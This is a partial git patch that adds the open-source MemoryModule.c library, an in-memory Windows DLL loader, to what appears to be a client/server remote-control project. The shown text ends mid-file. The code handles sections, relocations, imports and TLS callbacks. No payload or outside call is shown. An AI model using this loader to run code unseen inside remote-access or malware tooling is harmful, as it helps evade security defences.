From ca8ff799ef7f3f6c743ddab05ecce84491c6613d Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Mon, 21 Apr 2025 02:39:00 +0800 Subject: [PATCH] Implement a memory DLL runner --- client/MemoryModule.c | 1202 ++++++++++++++++++++++++++++++ client/MemoryModule.h | 168 +++++ client/TestRun_vs2015.vcxproj | 2 + client/test.cpp | 175 ++++- server/2015Remote/IOCPServer.cpp | 17 +- server/2015Remote/IOCPServer.h | 28 +- 6 files changed, 1572 insertions(+), 20 deletions(-) create mode 100644 client/MemoryModule.c create mode 100644 client/MemoryModule.h diff --git a/client/MemoryModule.c b/client/MemoryModule.c new file mode 100644 index 0000000..9f95a70 --- /dev/null +++ b/client/MemoryModule.c @@ -0,0 +1,1202 @@ +/* + * Memory DLL loading code + * Version 0.0.4 + * + * Copyright (c) 2004-2015 by Joachim Bauch / mail@joachim-bauch.de + * http://www.joachim-bauch.de + * + * The contents of this file are subject to the Mozilla Public License Version + * 2.0 (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * http://www.mozilla.org/MPL/ + * + * Software distributed under the License is distributed on an "AS IS" basis, + * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License + * for the specific language governing rights and limitations under the + * License. + * + * The Original Code is MemoryModule.c + * + * The Initial Developer of the Original Code is Joachim Bauch. + * + * Portions created by Joachim Bauch are Copyright (C) 2004-2015 + * Joachim Bauch. All Rights Reserved. + * + * + * THeller: Added binary search in MemoryGetProcAddress function + * (#define USE_BINARY_SEARCH to enable it). This gives a very large + * speedup for libraries that exports lots of functions. + * + * These portions are Copyright (C) 2013 Thomas Heller. + */ + +#include +#include +#include +#include +#ifdef DEBUG_OUTPUT +#include +#endif + +#if _MSC_VER +// Disable warning about data -> function pointer conversion +#pragma warning(disable:4055) + // C4244: conversion from 'uintptr_t' to 'DWORD', possible loss of data. +#pragma warning(error: 4244) +// C4267: conversion from 'size_t' to 'int', possible loss of data. +#pragma warning(error: 4267) + +#define inline __inline +#endif + +#ifndef IMAGE_SIZEOF_BASE_RELOCATION +// Vista SDKs no longer define IMAGE_SIZEOF_BASE_RELOCATION!? +#define IMAGE_SIZEOF_BASE_RELOCATION (sizeof(IMAGE_BASE_RELOCATION)) +#endif + +#ifdef _WIN64 +#define HOST_MACHINE IMAGE_FILE_MACHINE_AMD64 +#else +#define HOST_MACHINE IMAGE_FILE_MACHINE_I386 +#endif + +#include "MemoryModule.h" + +struct ExportNameEntry { + LPCSTR name; + WORD idx; +}; + +typedef BOOL (WINAPI *DllEntryProc)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved); +typedef int (WINAPI *ExeEntryProc)(void); + +#ifdef _WIN64 +typedef struct POINTER_LIST { + struct POINTER_LIST *next; + void *address; +} POINTER_LIST; +#endif + +typedef struct { + PIMAGE_NT_HEADERS headers; + unsigned char *codeBase; + HCUSTOMMODULE *modules; + int numModules; + BOOL initialized; + BOOL isDLL; + BOOL isRelocated; + CustomAllocFunc alloc; + CustomFreeFunc free; + CustomLoadLibraryFunc loadLibrary; + CustomGetProcAddressFunc getProcAddress; + CustomFreeLibraryFunc freeLibrary; + struct ExportNameEntry *nameExportsTable; + void *userdata; + ExeEntryProc exeEntry; + DWORD pageSize; +#ifdef _WIN64 + POINTER_LIST *blockedMemory; +#endif +} MEMORYMODULE, *PMEMORYMODULE; + +typedef struct { + LPVOID address; + LPVOID alignedAddress; + SIZE_T size; + DWORD characteristics; + BOOL last; +} SECTIONFINALIZEDATA, *PSECTIONFINALIZEDATA; + +#define GET_HEADER_DICTIONARY(module, idx) &(module)->headers->OptionalHeader.DataDirectory[idx] + +static inline uintptr_t +AlignValueDown(uintptr_t value, uintptr_t alignment) { + return value & ~(alignment - 1); +} + +static inline LPVOID +AlignAddressDown(LPVOID address, uintptr_t alignment) { + return (LPVOID) AlignValueDown((uintptr_t) address, alignment); +} + +static inline size_t +AlignValueUp(size_t value, size_t alignment) { + return (value + alignment - 1) & ~(alignment - 1); +} + +static inline void* +OffsetPointer(void* data, ptrdiff_t offset) { + return (void*) ((uintptr_t) data + offset); +} + +static inline void +OutputLastError(const char *msg) +{ +#ifndef DEBUG_OUTPUT + UNREFERENCED_PARAMETER(msg); +#else + LPVOID tmp; + char *tmpmsg; + FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, + NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&tmp, 0, NULL); + tmpmsg = (char *)LocalAlloc(LPTR, strlen(msg) + strlen(tmp) + 3); + sprintf(tmpmsg, "%s: %s", msg, tmp); + OutputDebugString(tmpmsg); + LocalFree(tmpmsg); + LocalFree(tmp); +#endif +} + +#ifdef _WIN64 +static void +FreePointerList(POINTER_LIST *head, CustomFreeFunc freeMemory, void *userdata) +{ + POINTER_LIST *node = head; + while (node) { + POINTER_LIST *next; + freeMemory(node->address, 0, MEM_RELEASE, userdata); + next = node->next; + free(node); + node = next; + } +} +#endif + +static BOOL +CheckSize(size_t size, size_t expected) { + if (size < expected) { + SetLastError(ERROR_INVALID_DATA); + return FALSE; + } + + return TRUE; +} + +static BOOL +CopySections(const unsigned char *data, size_t size, PIMAGE_NT_HEADERS old_headers, PMEMORYMODULE module) +{ + int i, section_size; + unsigned char *codeBase = module->codeBase; + unsigned char *dest; + PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(module->headers); + for (i=0; iheaders->FileHeader.NumberOfSections; i++, section++) { + if (section->SizeOfRawData == 0) { + // section doesn't contain data in the dll itself, but may define + // uninitialized data + section_size = old_headers->OptionalHeader.SectionAlignment; + if (section_size > 0) { + dest = (unsigned char *)module->alloc(codeBase + section->VirtualAddress, + section_size, + MEM_COMMIT, + PAGE_READWRITE, + module->userdata); + if (dest == NULL) { + return FALSE; + } + + // Always use position from file to support alignments smaller + // than page size (allocation above will align to page size). + dest = codeBase + section->VirtualAddress; + // NOTE: On 64bit systems we truncate to 32bit here but expand + // again later when "PhysicalAddress" is used. + section->Misc.PhysicalAddress = (DWORD) ((uintptr_t) dest & 0xffffffff); + memset(dest, 0, section_size); + } + + // section is empty + continue; + } + + if (!CheckSize(size, section->PointerToRawData + section->SizeOfRawData)) { + return FALSE; + } + + // commit memory block and copy data from dll + dest = (unsigned char *)module->alloc(codeBase + section->VirtualAddress, + section->SizeOfRawData, + MEM_COMMIT, + PAGE_READWRITE, + module->userdata); + if (dest == NULL) { + return FALSE; + } + + // Always use position from file to support alignments smaller + // than page size (allocation above will align to page size). + dest = codeBase + section->VirtualAddress; + memcpy(dest, data + section->PointerToRawData, section->SizeOfRawData); + // NOTE: On 64bit systems we truncate to 32bit here but expand + // again later when "PhysicalAddress" is used. + section->Misc.PhysicalAddress = (DWORD) ((uintptr_t) dest & 0xffffffff); + } + + return TRUE; +} + +// Protection flags for memory pages (Executable, Readable, Writeable) +static int ProtectionFlags[2][2][2] = { + { + // not executable + {PAGE_NOACCESS, PAGE_WRITECOPY}, + {PAGE_READONLY, PAGE_READWRITE}, + }, { + // executable + {PAGE_EXECUTE, PAGE_EXECUTE_WRITECOPY}, + {PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE}, + }, +}; + +static SIZE_T +GetRealSectionSize(PMEMORYMODULE module, PIMAGE_SECTION_HEADER section) { + DWORD size = section->SizeOfRawData; + if (size == 0) { + if (section->Characteristics & IMAGE_SCN_CNT_INITIALIZED_DATA) { + size = module->headers->OptionalHeader.SizeOfInitializedData; + } else if (section->Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA) { + size = module->headers->OptionalHeader.SizeOfUninitializedData; + } + } + return (SIZE_T) size; +} + +static BOOL +FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) { + DWORD protect, oldProtect; + BOOL executable; + BOOL readable; + BOOL writeable; + + if (sectionData->size == 0) { + return TRUE; + } + + if (sectionData->characteristics & IMAGE_SCN_MEM_DISCARDABLE) { + // section is not needed any more and can safely be freed + if (sectionData->address == sectionData->alignedAddress && + (sectionData->last || + module->headers->OptionalHeader.SectionAlignment == module->pageSize || + (sectionData->size % module->pageSize) == 0) + ) { + // Only allowed to decommit whole pages + module->free(sectionData->address, sectionData->size, MEM_DECOMMIT, module->userdata); + } + return TRUE; + } + + // determine protection flags based on characteristics + executable = (sectionData->characteristics & IMAGE_SCN_MEM_EXECUTE) != 0; + readable = (sectionData->characteristics & IMAGE_SCN_MEM_READ) != 0; + writeable = (sectionData->characteristics & IMAGE_SCN_MEM_WRITE) != 0; + protect = ProtectionFlags[executable][readable][writeable]; + if (sectionData->characteristics & IMAGE_SCN_MEM_NOT_CACHED) { + protect |= PAGE_NOCACHE; + } + + // change memory access flags + if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) { + OutputLastError("Error protecting memory page"); + return FALSE; + } + + return TRUE; +} + +static BOOL +FinalizeSections(PMEMORYMODULE module) +{ + int i; + PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(module->headers); +#ifdef _WIN64 + // "PhysicalAddress" might have been truncated to 32bit above, expand to + // 64bits again. + uintptr_t imageOffset = ((uintptr_t) module->headers->OptionalHeader.ImageBase & 0xffffffff00000000); +#else + static const uintptr_t imageOffset = 0; +#endif + SECTIONFINALIZEDATA sectionData; + sectionData.address = (LPVOID)((uintptr_t)section->Misc.PhysicalAddress | imageOffset); + sectionData.alignedAddress = AlignAddressDown(sectionData.address, module->pageSize); + sectionData.size = GetRealSectionSize(module, section); + sectionData.characteristics = section->Characteristics; + sectionData.last = FALSE; + section++; + + // loop through all sections and change access flags + for (i=1; iheaders->FileHeader.NumberOfSections; i++, section++) { + LPVOID sectionAddress = (LPVOID)((uintptr_t)section->Misc.PhysicalAddress | imageOffset); + LPVOID alignedAddress = AlignAddressDown(sectionAddress, module->pageSize); + SIZE_T sectionSize = GetRealSectionSize(module, section); + // Combine access flags of all sections that share a page + // TODO(fancycode): We currently share flags of a trailing large section + // with the page of a first small section. This should be optimized. + if (sectionData.alignedAddress == alignedAddress || (uintptr_t) sectionData.address + sectionData.size > (uintptr_t) alignedAddress) { + // Section shares page with previous + if ((section->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) == 0 || (sectionData.characteristics & IMAGE_SCN_MEM_DISCARDABLE) == 0) { + sectionData.characteristics = (sectionData.characteristics | section->Characteristics) & ~IMAGE_SCN_MEM_DISCARDABLE; + } else { + sectionData.characteristics |= section->Characteristics; + } + sectionData.size = (((uintptr_t)sectionAddress) + ((uintptr_t) sectionSize)) - (uintptr_t) sectionData.address; + continue; + } + + if (!FinalizeSection(module, §ionData)) { + return FALSE; + } + sectionData.address = sectionAddress; + sectionData.alignedAddress = alignedAddress; + sectionData.size = sectionSize; + sectionData.characteristics = section->Characteristics; + } + sectionData.last = TRUE; + if (!FinalizeSection(module, §ionData)) { + return FALSE; + } + return TRUE; +} + +static BOOL +ExecuteTLS(PMEMORYMODULE module) +{ + unsigned char *codeBase = module->codeBase; + PIMAGE_TLS_DIRECTORY tls; + PIMAGE_TLS_CALLBACK* callback; + + PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_TLS); + if (directory->VirtualAddress == 0) { + return TRUE; + } + + tls = (PIMAGE_TLS_DIRECTORY) (codeBase + directory->VirtualAddress); + callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks; + if (callback) { + while (*callback) { + (*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL); + callback++; + } + } + return TRUE; +} + +static BOOL +PerformBaseRelocation(PMEMORYMODULE module, ptrdiff_t delta) +{ + unsigned char *codeBase = module->codeBase; + PIMAGE_BASE_RELOCATION relocation; + + PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_BASERELOC); + if (directory->Size == 0) { + return (delta == 0); + } + + relocation = (PIMAGE_BASE_RELOCATION) (codeBase + directory->VirtualAddress); + for (; relocation->VirtualAddress > 0; ) { + DWORD i; + unsigned char *dest = codeBase + relocation->VirtualAddress; + unsigned short *relInfo = (unsigned short*) OffsetPointer(relocation, IMAGE_SIZEOF_BASE_RELOCATION); + for (i=0; i<((relocation->SizeOfBlock-IMAGE_SIZEOF_BASE_RELOCATION) / 2); i++, relInfo++) { + // the upper 4 bits define the type of relocation + int type = *relInfo >> 12; + // the lower 12 bits define the offset + int offset = *relInfo & 0xfff; + + switch (type) + { + case IMAGE_REL_BASED_ABSOLUTE: + // skip relocation + break; + + case IMAGE_REL_BASED_HIGHLOW: + // change complete 32 bit address + { + DWORD *patchAddrHL = (DWORD *) (dest + offset); + *patchAddrHL += (DWORD) delta; + } + break; + +#ifdef _WIN64 + case IMAGE_REL_BASED_DIR64: + { + ULONGLONG *patchAddr64 = (ULONGLONG *) (dest + offset); + *patchAddr64 += (ULONGLONG) delta; + } + break; +#endif + + default: + //printf("Unknown relocation: %d\n", type); + break; + } + } + + // advance to next relocation block + relocation = (PIMAGE_BASE_RELOCATION) OffsetPointer(relocation, relocation->SizeOfBlock); + } + return TRUE; +} + +static BOOL +BuildImportTable(PMEMORYMODULE module) +{ + unsigned char *codeBase = module->codeBase; + PIMAGE_IMPORT_DESCRIPTOR importDesc; + BOOL result = TRUE; + + PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (directory->Size == 0) { + return TRUE; + } + + importDesc = (PIMAGE_IMPORT_DESCRIPTOR) (codeBase + directory->VirtualAddress); + for (; !IsBadReadPtr(importDesc, sizeof(IMAGE_IMPORT_DESCRIPTOR)) && importDesc->Name; importDesc++) { + uintptr_t *thunkRef; + FARPROC *funcRef; + HCUSTOMMODULE *tmp; + HCUSTOMMODULE handle = module->loadLibrary((LPCSTR) (codeBase + importDesc->Name), module->userdata); + if (handle == NULL) { + SetLastError(ERROR_MOD_NOT_FOUND); + result = FALSE; + break; + } + + tmp = (HCUSTOMMODULE *) realloc(module->modules, (module->numModules+1)*(sizeof(HCUSTOMMODULE))); + if (tmp == NULL) { + module->freeLibrary(handle, module->userdata); + SetLastError(ERROR_OUTOFMEMORY); + result = FALSE; + break; + } + module->modules = tmp; + + module->modules[module->numModules++] = handle; + if (importDesc->OriginalFirstThunk) { + thunkRef = (uintptr_t *) (codeBase + importDesc->OriginalFirstThunk); + funcRef = (FARPROC *) (codeBase + importDesc->FirstThunk); + } else { + // no hint table + thunkRef = (uintptr_t *) (codeBase + importDesc->FirstThunk); + funcRef = (FARPROC *) (codeBase + importDesc->FirstThunk); + } + for (; *thunkRef; thunkRef++, funcRef++) { + if (IMAGE_SNAP_BY_ORDINAL(*thunkRef)) { + *funcRef = module->getProcAddress(handle, (LPCSTR)IMAGE_ORDINAL(*thunkRef), module->userdata); + } else { + PIMAGE_IMPORT_BY_NAME thunkData = (PIMAGE_IMPORT_BY_NAME) (codeBase + (*thunkRef)); + *funcRef = module->getProcAddress(handle, (LPCSTR)&thunkData->Name, module->userdata); + } + if (*funcRef == 0) { + result = FALSE; + break; + } + } + + if (!result) { + module->freeLibrary(handle, module->userdata); + SetLastError(ERROR_PROC_NOT_FOUND); + break; + } + } + + return result; +} + +LPVOID MemoryDefaultAlloc(LPVOID address, SIZE_T size, DWORD allocationType, DWORD protect, void* userdata) +{ + UNREFERENCED_PARAMETER(userdata); + return VirtualAlloc(address, size, allocationType, protect); +} + +BOOL MemoryDefaultFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType, void* userdata) +{ + UNREFERENCED_PARAMETER(userdata); + return VirtualFree(lpAddress, dwSize, dwFreeType); +} + +HCUSTOMMODULE MemoryDefaultLoadLibrary(LPCSTR filename, void *userdata) +{ + HMODULE result; + UNREFERENCED_PARAMETER(userdata); + result = LoadLibraryA(filename); + if (result == NULL) { + return NULL; + } + + return (HCUSTOMMODULE) result; +} + +FARPROC MemoryDefaultGetProcAddress(HCUSTOMMODULE module, LPCSTR name, void *userdata) +{ + UNREFERENCED_PARAMETER(userdata); + return (FARPROC) GetProcAddress((HMODULE) module, name); +} + +void MemoryDefaultFreeLibrary(HCUSTOMMODULE module, void *userdata) +{ + UNREFERENCED_PARAMETER(userdata); + FreeLibrary((HMODULE) module); +} + +HMEMORYMODULE MemoryLoadLibrary(const void *data, size_t size) +{ + return MemoryLoadLibraryEx(data, size, MemoryDefaultAlloc, MemoryDefaultFree, MemoryDefaultLoadLibrary, MemoryDefaultGetProcAddress, MemoryDefaultFreeLibrary, NULL); +} + +HMEMORYMODULE MemoryLoadLibraryEx(const void *data, size_t size, + CustomAllocFunc allocMemory, + CustomFreeFunc freeMemory, + CustomLoadLibraryFunc loadLibrary, + CustomGetProcAddressFunc getProcAddress, + CustomFreeLibraryFunc freeLibrary, + void *userdata) +{ + PMEMORYMODULE result = NULL; + PIMAGE_DOS_HEADER dos_header; + PIMAGE_NT_HEADERS old_header; + unsigned char *code, *headers; + ptrdiff_t locationDelta; + SYSTEM_INFO sysInfo; + PIMAGE_SECTION_HEADER section; + DWORD i; + size_t optionalSectionSize; + size_t lastSectionEnd = 0; + size_t alignedImageSize; +#ifdef _WIN64 + POINTER_LIST *blockedMemory = NULL; +#endif + + if (!CheckSize(size, sizeof(IMAGE_DOS_HEADER))) { + return NULL; + } + dos_header = (PIMAGE_DOS_HEADER)data; + if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) { + SetLastError(ERROR_BAD_EXE_FORMAT); + return NULL; + } + + if (!CheckSize(size, dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS))) { + return NULL; + } + old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(data))[dos_header->e_lfanew]; + if (old_header->Signature != IMAGE_NT_SIGNATURE) { + SetLastError(ERROR_BAD_EXE_FORMAT); + return NULL; + } + + if (old_header->FileHeader.Machine != HOST_MACHINE) { + SetLastError(ERROR_BAD_EXE_FORMAT); + return NULL; + } + + if (old_header->OptionalHeader.SectionAlignment & 1) { + // Only support section alignments that are a multiple of 2 + SetLastError(ERROR_BAD_EXE_FORMAT); + return NULL; + } + + section = IMAGE_FIRST_SECTION(old_header); + optionalSectionSize = old_header->OptionalHeader.SectionAlignment; + for (i=0; iFileHeader.NumberOfSections; i++, section++) { + size_t endOfSection; + if (section->SizeOfRawData == 0) { + // Section without data in the DLL + endOfSection = section->VirtualAddress + optionalSectionSize; + } else { + endOfSection = section->VirtualAddress + section->SizeOfRawData; + } + + if (endOfSection > lastSectionEnd) { + lastSectionEnd = endOfSection; + } + } + + GetNativeSystemInfo(&sysInfo); + alignedImageSize = AlignValueUp(old_header->OptionalHeader.SizeOfImage, sysInfo.dwPageSize); + if (alignedImageSize != AlignValueUp(lastSectionEnd, sysInfo.dwPageSize)) { + SetLastError(ERROR_BAD_EXE_FORMAT); + return NULL; + } + + // reserve memory for image of library + // XXX: is it correct to commit the complete memory region at once? + // calling DllEntry raises an exception if we don't... + code = (unsigned char *)allocMemory((LPVOID)(old_header->OptionalHeader.ImageBase), + alignedImageSize, + MEM_RESERVE | MEM_COMMIT, + PAGE_READWRITE, + userdata); + + if (code == NULL) { + // try to allocate memory at arbitrary position + code = (unsigned char *)allocMemory(NULL, + alignedImageSize, + MEM_RESERVE | MEM_COMMIT, + PAGE_READWRITE, + userdata); + if (code == NULL) { + SetLastError(ERROR_OUTOFMEMORY); + return NULL; + } + } + +#ifdef _WIN64 + // Memory block may not span 4 GB boundaries. + while ((((uintptr_t) code) >> 32) < (((uintptr_t) (code + alignedImageSize)) >> 32)) { + POINTER_LIST *node = (POINTER_LIST*) malloc(sizeof(POINTER_LIST)); + if (!node) { + freeMemory(code, 0, MEM_RELEASE, userdata); + FreePointerList(blockedMemory, freeMemory, userdata); + SetLastError(ERROR_OUTOFMEMORY); + return NULL; + } + + node->next = blockedMemory; + node->address = code; + blockedMemory = node; + + code = (unsigned char *)allocMemory(NULL, + alignedImageSize, + MEM_RESERVE | MEM_COMMIT, + PAGE_READWRITE, + userdata); + if (code == NULL) { + FreePointerList(blockedMemory, freeMemory, userdata); + SetLastError(ERROR_OUTOFMEMORY); + return NULL; + } + } +#endif + + result = (PMEMORYMODULE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(MEMORYMODULE)); + if (result == NULL) { + freeMemory(code, 0, MEM_RELEASE, userdata); +#ifdef _WIN64 + FreePointerList(blockedMemory, freeMemory, userdata); +#endif + SetLastError(ERROR_OUTOFMEMORY); + return NULL; + } + + result->codeBase = code; + result->isDLL = (old_header->FileHeader.Characteristics & IMAGE_FILE_DLL) != 0; + result->alloc = allocMemory; + result->free = freeMemory; + result->loadLibrary = loadLibrary; + result->getProcAddress = getProcAddress; + result->freeLibrary = freeLibrary; + result->userdata = userdata; + result->pageSize = sysInfo.dwPageSize; +#ifdef _WIN64 + result->blockedMemory = blockedMemory; +#endif + + if (!CheckSize(size, old_header->OptionalHeader.SizeOfHeaders)) { + goto error; + } + + // commit memory for headers + headers = (unsigned char *)allocMemory(code, + old_header->OptionalHeader.SizeOfHeaders, + MEM_COMMIT, + PAGE_READWRITE, + userdata); + + // copy PE header to code + memcpy(headers, dos_header, old_header->OptionalHeader.SizeOfHeaders); + result->headers = (PIMAGE_NT_HEADERS)&((const unsigned char *)(headers))[dos_header->e_lfanew]; + + // update position + result->headers->OptionalHeader.ImageBase = (uintptr_t)code; + + // copy sections from DLL file block to new memory location + if (!CopySections((const unsigned char *) data, size, old_header, result)) { + goto error; + } + + // adjust base address of imported data + locationDelta = (ptrdiff_t)(result->headers->OptionalHeader.ImageBase - old_header->OptionalHeader.ImageBase); + if (locationDelta != 0) { + result->isRelocated = PerformBaseRelocation(result, locationDelta); + } else { + result->isRelocated = TRUE; + } + + // load required dlls and adjust function table of imports + if (!BuildImportTable(result)) { + goto error; + } + + // mark memory pages depending on section headers and release + // sections that are marked as "discardable" + if (!FinalizeSections(result)) { + goto error; + } + + // TLS callbacks are executed BEFORE the main loading + if (!ExecuteTLS(result)) { + goto error; + } + + // get entry point of loaded library + if (result->headers->OptionalHeader.AddressOfEntryPoint != 0) { + if (result->isDLL) { + DllEntryProc DllEntry = (DllEntryProc)(LPVOID)(code + result->headers->OptionalHeader.AddressOfEntryPoint); + // notify library about attaching to process + BOOL successfull = (*DllEntry)((HINSTANCE)code, DLL_PROCESS_ATTACH, 0); + if (!successfull) { + SetLastError(ERROR_DLL_INIT_FAILED); + goto error; + } + result->initialized = TRUE; + } else { + result->exeEntry = (ExeEntryProc)(LPVOID)(code + result->headers->OptionalHeader.AddressOfEntryPoint); + } + } else { + result->exeEntry = NULL; + } + + return (HMEMORYMODULE)result; + +error: + // cleanup + MemoryFreeLibrary(result); + return NULL; +} + +static int _compare(const void *a, const void *b) +{ + const struct ExportNameEntry *p1 = (const struct ExportNameEntry*) a; + const struct ExportNameEntry *p2 = (const struct ExportNameEntry*) b; + return strcmp(p1->name, p2->name); +} + +static int _find(const void *a, const void *b) +{ + LPCSTR *name = (LPCSTR *) a; + const struct ExportNameEntry *p = (const struct ExportNameEntry*) b; + return strcmp(*name, p->name); +} + +FARPROC MemoryGetProcAddress(HMEMORYMODULE mod, LPCSTR name) +{ + PMEMORYMODULE module = (PMEMORYMODULE)mod; + unsigned char *codeBase = module->codeBase; + DWORD idx = 0; + PIMAGE_EXPORT_DIRECTORY exports; + PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_EXPORT); + if (directory->Size == 0) { + // no export table found + SetLastError(ERROR_PROC_NOT_FOUND); + return NULL; + } + + exports = (PIMAGE_EXPORT_DIRECTORY) (codeBase + directory->VirtualAddress); + if (exports->NumberOfNames == 0 || exports->NumberOfFunctions == 0) { + // DLL doesn't export anything + SetLastError(ERROR_PROC_NOT_FOUND); + return NULL; + } + + if (HIWORD(name) == 0) { + // load function by ordinal value + if (LOWORD(name) < exports->Base) { + SetLastError(ERROR_PROC_NOT_FOUND); + return NULL; + } + + idx = LOWORD(name) - exports->Base; + } else if (!exports->NumberOfNames) { + SetLastError(ERROR_PROC_NOT_FOUND); + return NULL; + } else { + const struct ExportNameEntry *found; + + // Lazily build name table and sort it by names + if (!module->nameExportsTable) { + DWORD i; + DWORD *nameRef = (DWORD *) (codeBase + exports->AddressOfNames); + WORD *ordinal = (WORD *) (codeBase + exports->AddressOfNameOrdinals); + struct ExportNameEntry *entry = (struct ExportNameEntry*) malloc(exports->NumberOfNames * sizeof(struct ExportNameEntry)); + module->nameExportsTable = entry; + if (!entry) { + SetLastError(ERROR_OUTOFMEMORY); + return NULL; + } + for (i=0; iNumberOfNames; i++, nameRef++, ordinal++, entry++) { + entry->name = (const char *) (codeBase + (*nameRef)); + entry->idx = *ordinal; + } + qsort(module->nameExportsTable, + exports->NumberOfNames, + sizeof(struct ExportNameEntry), _compare); + } + + // search function name in list of exported names with binary search + found = (const struct ExportNameEntry*) bsearch(&name, + module->nameExportsTable, + exports->NumberOfNames, + sizeof(struct ExportNameEntry), _find); + if (!found) { + // exported symbol not found + SetLastError(ERROR_PROC_NOT_FOUND); + return NULL; + } + + idx = found->idx; + } + + if (idx > exports->NumberOfFunctions) { + // name <-> ordinal number don't match + SetLastError(ERROR_PROC_NOT_FOUND); + return NULL; + } + + // AddressOfFunctions contains the RVAs to the "real" functions + return (FARPROC)(LPVOID)(codeBase + (*(DWORD *) (codeBase + exports->AddressOfFunctions + (idx*4)))); +} + +void MemoryFreeLibrary(HMEMORYMODULE mod) +{ + PMEMORYMODULE module = (PMEMORYMODULE)mod; + + if (module == NULL) { + return; + } + if (module->initialized) { + // notify library about detaching from process + DllEntryProc DllEntry = (DllEntryProc)(LPVOID)(module->codeBase + module->headers->OptionalHeader.AddressOfEntryPoint); + (*DllEntry)((HINSTANCE)module->codeBase, DLL_PROCESS_DETACH, 0); + } + + free(module->nameExportsTable); + if (module->modules != NULL) { + // free previously opened libraries + int i; + for (i=0; inumModules; i++) { + if (module->modules[i] != NULL) { + module->freeLibrary(module->modules[i], module->userdata); + } + } + + free(module->modules); + } + + if (module->codeBase != NULL) { + // release memory of library + module->free(module->codeBase, 0, MEM_RELEASE, module->userdata); + } + +#ifdef _WIN64 + FreePointerList(module->blockedMemory, module->free, module->userdata); +#endif + HeapFree(GetProcessHeap(), 0, module); +} + +int MemoryCallEntryPoint(HMEMORYMODULE mod) +{ + PMEMORYMODULE module = (PMEMORYMODULE)mod; + + if (module == NULL || module->isDLL || module->exeEntry == NULL || !module->isRelocated) { + return -1; + } + + return module->exeEntry(); +} + +#define DEFAULT_LANGUAGE MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL) + +HMEMORYRSRC MemoryFindResource(HMEMORYMODULE module, LPCTSTR name, LPCTSTR type) +{ + return MemoryFindResourceEx(module, name, type, DEFAULT_LANGUAGE); +} + +static PIMAGE_RESOURCE_DIRECTORY_ENTRY _MemorySearchResourceEntry( + void *root, + PIMAGE_RESOURCE_DIRECTORY resources, + LPCTSTR key) +{ + PIMAGE_RESOURCE_DIRECTORY_ENTRY entries = (PIMAGE_RESOURCE_DIRECTORY_ENTRY) (resources + 1); + PIMAGE_RESOURCE_DIRECTORY_ENTRY result = NULL; + DWORD start; + DWORD end; + DWORD middle; + + if (!IS_INTRESOURCE(key) && key[0] == TEXT('#')) { + // special case: resource id given as string + TCHAR *endpos = NULL; + long int tmpkey = (WORD) _tcstol((TCHAR *) &key[1], &endpos, 10); + if (tmpkey <= 0xffff && lstrlen(endpos) == 0) { + key = MAKEINTRESOURCE(tmpkey); + } + } + + // entries are stored as ordered list of named entries, + // followed by an ordered list of id entries - we can do + // a binary search to find faster... + if (IS_INTRESOURCE(key)) { + WORD check = (WORD) (uintptr_t) key; + start = resources->NumberOfNamedEntries; + end = start + resources->NumberOfIdEntries; + + while (end > start) { + WORD entryName; + middle = (start + end) >> 1; + entryName = (WORD) entries[middle].Name; + if (check < entryName) { + end = (end != middle ? middle : middle-1); + } else if (check > entryName) { + start = (start != middle ? middle : middle+1); + } else { + result = &entries[middle]; + break; + } + } + } else { + LPCWSTR searchKey; + size_t searchKeyLen = _tcslen(key); +#if defined(UNICODE) + searchKey = key; +#else + // Resource names are always stored using 16bit characters, need to + // convert string we search for. +#define MAX_LOCAL_KEY_LENGTH 2048 + // In most cases resource names are short, so optimize for that by + // using a pre-allocated array. + wchar_t _searchKeySpace[MAX_LOCAL_KEY_LENGTH+1]; + LPWSTR _searchKey; + if (searchKeyLen > MAX_LOCAL_KEY_LENGTH) { + size_t _searchKeySize = (searchKeyLen + 1) * sizeof(wchar_t); + _searchKey = (LPWSTR) malloc(_searchKeySize); + if (_searchKey == NULL) { + SetLastError(ERROR_OUTOFMEMORY); + return NULL; + } + } else { + _searchKey = &_searchKeySpace[0]; + } + + mbstowcs(_searchKey, key, searchKeyLen); + _searchKey[searchKeyLen] = 0; + searchKey = _searchKey; +#endif + start = 0; + end = resources->NumberOfNamedEntries; + while (end > start) { + int cmp; + PIMAGE_RESOURCE_DIR_STRING_U resourceString; + middle = (start + end) >> 1; + resourceString = (PIMAGE_RESOURCE_DIR_STRING_U) OffsetPointer(root, entries[middle].Name & 0x7FFFFFFF); + cmp = _wcsnicmp(searchKey, resourceString->NameString, resourceString->Length); + if (cmp == 0) { + // Handle partial match + if (searchKeyLen > resourceString->Length) { + cmp = 1; + } else if (searchKeyLen < resourceString->Length) { + cmp = -1; + } + } + if (cmp < 0) { + end = (middle != end ? middle : middle-1); + } else if (cmp > 0) { + start = (middle != start ? middle : middle+1); + } else { + result = 